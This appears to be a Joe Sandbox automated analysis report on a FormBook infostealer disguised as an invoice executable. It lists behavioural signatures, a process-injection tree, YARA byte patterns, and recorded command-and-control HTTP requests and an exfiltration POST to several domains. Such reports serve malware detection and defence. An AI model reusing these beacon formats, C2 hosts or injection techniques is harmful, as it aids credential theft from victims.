Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NVOICE FOR THE MONTH OF AUG-24.exe

Overview

General Information

Sample name:NVOICE FOR THE MONTH OF AUG-24.exe
Analysis ID:1519458
MD5:8f28011c24818124770ba3d2af3591b1
SHA1:b619d4d9ffb5ce1a5baed19a463ea792127bc5ec
SHA256:7c43c4fb39ad14b2de1dfa864eda67bddb6536b709e86650b55009c2ff1c48d5
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NVOICE FOR THE MONTH OF AUG-24.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe" MD5: 8F28011C24818124770BA3D2AF3591B1)
    • svchost.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tStjsTMXwkdtbv.exe (PID: 5084 cmdline: "C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TapiUnattend.exe (PID: 4248 cmdline: "C:\Windows\SysWOW64\TapiUnattend.exe" MD5: D5BFFD755F566AAACB57CF83FDAA5CD0)
          • tStjsTMXwkdtbv.exe (PID: 3844 cmdline: "C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16652:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17452:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", CommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", ParentImage: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe, ParentProcessId: 6788, ParentProcessName: NVOICE FOR THE MONTH OF AUG-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", ProcessId: 4268, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", CommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", ParentImage: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe, ParentProcessId: 6788, ParentProcessName: NVOICE FOR THE MONTH OF AUG-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe", ProcessId: 4268, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: NVOICE FOR THE MONTH OF AUG-24.exeAvira: detected
            Source: NVOICE FOR THE MONTH OF AUG-24.exeReversingLabs: Detection: 52%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: NVOICE FOR THE MONTH OF AUG-24.exeJoe Sandbox ML: detected
            Source: NVOICE FOR THE MONTH OF AUG-24.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2139621722.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139603424.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158542125.00000000004A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tStjsTMXwkdtbv.exe, 00000005.00000000.2059651187.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4158279417.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1733167677.0000000004880000.00000004.00001000.00020000.00000000.sdmp, NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1734899159.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2043430913.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2041503834.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.000000000339E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.000000000368E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2163789613.0000000003197000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2166105453.0000000003348000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1733167677.0000000004880000.00000004.00001000.00020000.00000000.sdmp, NVOICE FOR THE MONTH OF AUG-24.exe, 00000000.00000003.1734899159.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2043430913.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2041503834.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139788141.000000000339E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000002.4159644521.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4159644521.000000000368E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2163789613.0000000003197000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2166105453.0000000003348000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000003B1C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456907740.0000000029F6C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4160033591.0000000003B1C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4158630244.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000002E7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2456907740.0000000029F6C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2139621722.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2139603424.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158542125.00000000004A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02C4C5F0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C4C5F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 4x nop then xor eax, eax6_2_02C39BB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 4x nop then mov ebx, 00000004h6_2_032304E3
            Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewIP Address: 44.213.25.70 44.213.25.70
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /lpl9/?wrRLLPUh=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.aaavvejibej.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /30jd/?wrRLLPUh=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /4hiy/?wrRLLPUh=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.weatherbook.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /jvjp/?wrRLLPUh=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.crowsecurity.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p8sm/?IH=BP3PrJvHc6MXcF&wrRLLPUh=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks= HTTP/1.1Host: www.inspireplay.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p2q3/?wrRLLPUh=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.shanhaiguan.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /ivo1/?IH=BP3PrJvHc6MXcF&wrRLLPUh=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ= HTTP/1.1Host: www.lanxuanz.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /85su/?wrRLLPUh=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.selftip.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.newdaydawning.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /2mtz/?IH=BP3PrJvHc6MXcF&wrRLLPUh=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1Host: www.o731lh.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /zl4r/?wrRLLPUh=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&IH=BP3PrJvHc6MXcF HTTP/1.1Host: www.wajf.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficDNS traffic detected: DNS query: www.aaavvejibej.bond
            Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global trafficDNS traffic detected: DNS query: www.weatherbook.live
            Source: global trafficDNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global trafficDNS traffic detected: DNS query: www.inspireplay.live
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
            Source: global trafficDNS traffic detected: DNS query: www.selftip.top
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.kfowks.site
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.wajf.net
            Source: global trafficDNS traffic detected: DNS query: www.turbonotes.app
            Source: unknownHTTP traffic detected: POST /30jd/ HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflateOrigin: http://www.whats-in-the-box.orgContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 205Referer: http://www.whats-in-the-box.org/30jd/User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Data Raw: 77 72 52 4c 4c 50 55 68 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 37 68 49 79 6a 33 33 43 37 66 5a 46 52 48 55 35 77 50 39 4b 56 72 4d 64 43 68 4b 39 75 35 2b 69 75 65 55 38 4e 32 45 6c 6f 48 7a 56 64 64 57 47 45 70 69 50 4e 41 68 53 50 34 4f 30 55 4c 39 35 79 34 47 76 63 79 4e 65 65 36 6f 64 53 4c 70 55 6d 76 50 48 78 30 77 76 76 69 59 39 75 51 49 59 63 44 6f 6f 31 73 62 63 32 39 51 65 50 58 6f 2b 58 71 48 37 79 79 73 4a 64 32 70 36 4d 65 64 34 68 2b 39 35 77 6b 38 70 45 46 6a 53 76 57 6e 66 53 4c 47 35 65 4f 43 4e 59 2f 50 76 69 53 4c 39 64 43 6a 30 66 61 46 57 61 4f 64 78 70 46 7a 4d 4e 54 6c 67 73 67 3d 3d Data Ascii: wrRLLPUh=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==
